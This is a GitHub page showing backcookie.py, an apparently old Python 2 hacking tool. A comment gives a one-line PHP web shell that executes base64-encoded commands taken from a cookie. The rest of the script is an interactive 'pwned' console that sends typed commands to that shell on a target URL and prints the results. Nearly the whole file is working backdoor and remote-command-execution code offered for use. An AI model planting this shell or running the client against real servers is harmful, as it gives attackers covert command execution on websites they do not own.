FilesExpand file tree

 master

/

backcookie.py

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

132 lines (120 loc) · 5.49 KB

 master

/

backcookie.py

Top

File metadata and controls

• Code
• Blame

132 lines (120 loc) · 5.49 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

#!/usr/bin/env python

# -*- coding: utf-8 -*-

#

#

# Copyright 2013 - 2014 @jofpin <[email protected]>

#

#

###############################################

import os #

import sys #

import urllib #

import optparse #

import requests #

from sys import argv #

############################################################################

# #

# Code: <?php error_reporting(0); system(base64_decode($_COOKIE["1"])); ?> ###

# It goes with a range from 1 to 0, but you can customize the parameter. #

# Example: python -u backcookie.py http://target.com/shell.php -c name_cokie #

# ###

# You can change the name of the cookie, in option -c. #

# a value of 1 for the name of your cookie, also in php. #

# Example: system(base64_decode($_COOKIE["yourcookie"])); #####

# so that the connection is successful. #

# #

# Backcookie is like the people who finds the love of his life every 2 months. #

################################################################################

#

#BackCookie

#

if "linux" in sys.platform:

os.system("clear")

elif "win" in sys.platform:

os.system("cls")

else:

pass

_version_ = "1.0.3"

# class of header, encode and colors

class core:

bc = 'Backcookie'

ua = 'User-Agent'

ck = 'Cookie'

eb = 'base64'

cl = {"blue": "\033[94m", "red": "\033[91m", "green": "\033[92m", "white": "\033[0m", "yellow": "\033[93m"}

def Error():

print core.cl['white'] + "\t\t-------------" + core.cl['red'] + core.bc + core.cl['white'] + "------------"

print "\t\t+ Status +"

print "\t\t+ sorry :( +"

print "\t\t-----------------------------------\n\n"

print core.cl['blue'] + "[-] " + core.cl['red'] + "Error:" + core.cl['yellow'] + " " + "Connection! \n" + core.cl['white']

exit(0)

def backcookie(command, host, cookie, vcmd):

headers = {

core.ua: 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1)',

core.ck: cookie + '=' + command.encode(core.eb)

}

try:

r = requests.get(host, headers=headers)

v = r.headers.values()

except:

Error()

if v[0] == "0" or vcmd == "command": # vcmd > validate command

print core.cl['blue'] + r.text.strip() + core.cl['white']

else:

Error()

def shell(host, cookie):

backcookie("cd",host,cookie,"")

print core.cl['white'] + "\t\t-------------" + core.cl['red'] + core.bc + core.cl['white'] + "------------"

print "\t\t+ Developed by: @jofpin +"

print "\t\t+ To play +"

print "\t\t-----------------------------------\n\n"

print core.cl['green'] + "[+] " + core.cl['blue'] + "Happy hacking" + core.cl['white']

print core.cl['green'] + "[+] " + core.cl['blue'] + "Sometimes it is not positive, but sometimes if!\n" + core.cl['white']

opu = urllib.urlopen(host) # opu > openurl

server = opu.headers.get("server")

domain = host.split("/")[2]

while True:

command = raw_input("@" + "pwned:~$ ")

if command != "binfo": #Information of conecction!

backcookie(command,host,cookie,"command")

else:

print "\n"

print core.cl['yellow'] + "[*] " + core.cl['white'] + "Information" + core.cl['white']

print core.cl['yellow'] + "[!] " + core.cl['green'] + "Host: " + core.cl['blue'] + domain + core.cl['white']

print core.cl['yellow'] + "[!] " + core.cl['green'] + "WebServer: " + core.cl['blue'] + server + core.cl['white']

print core.cl['yellow'] + "[!] " + core.cl['green'] + "Target: " + core.cl['blue'] + host + core.cl['white']

print core.cl['yellow'] + "[!] " + core.cl['green'] + "Cookie: " + core.cl['blue'] + cookie + core.cl['white']

print "\n"

command = raw_input("@" + "pwned:~$ ")

if command != "exit": #exit console backcookie

backcookie(command,host,cookie,"command")

else:

print "\t\t-------------" + core.cl['blue'] + "Developer" + core.cl['white'] + "------------"

print "\t\t+ José Pino (Fraph) +"

print "\t\t+ Security researcher +"

print "\t\t+ @jofpin +"

print "\t\t----------------------------------\n\n"

print core.cl['green'] + "[!] " + core.cl['blue'] + "Version:" + " " + core.cl['yellow'] + _version_ + core.cl['white']

print core.cl['blue'] + "[-] " + core.cl['red'] + core.bc + " OFF\n" + core.cl['white']

break

def main():

parser = optparse.OptionParser("python" + " " + "%prog -u <<URL>> -c <<Cookie>>", version="1.0.3")

parser.add_option('-u', dest="Url", type="string", help="specify hostname to run on")

parser.add_option('-c', dest="Cookie", type="string", help="specify Cookie")

(options, args) = parser.parse_args()

host = options.Url

cookie = options.Cookie

if host and cookie:

shell(host,cookie)

else:

parser.print_help()

exit(0)

if __name__ == "__main__":

try:

main()

except KeyboardInterrupt:

sys.exit(core.cl['blue'] + "\n\n[-] " + core.cl['green'] + "Status: " + core.cl['red'] + "close!\n" + core.cl['white']) #Ctrl + c = close

pass

except Exception as ke:

sys.exit(core.cl['red'] + "Error: " + core.cl['blue'] + "%s" % ke + core.cl['white']) #Result of error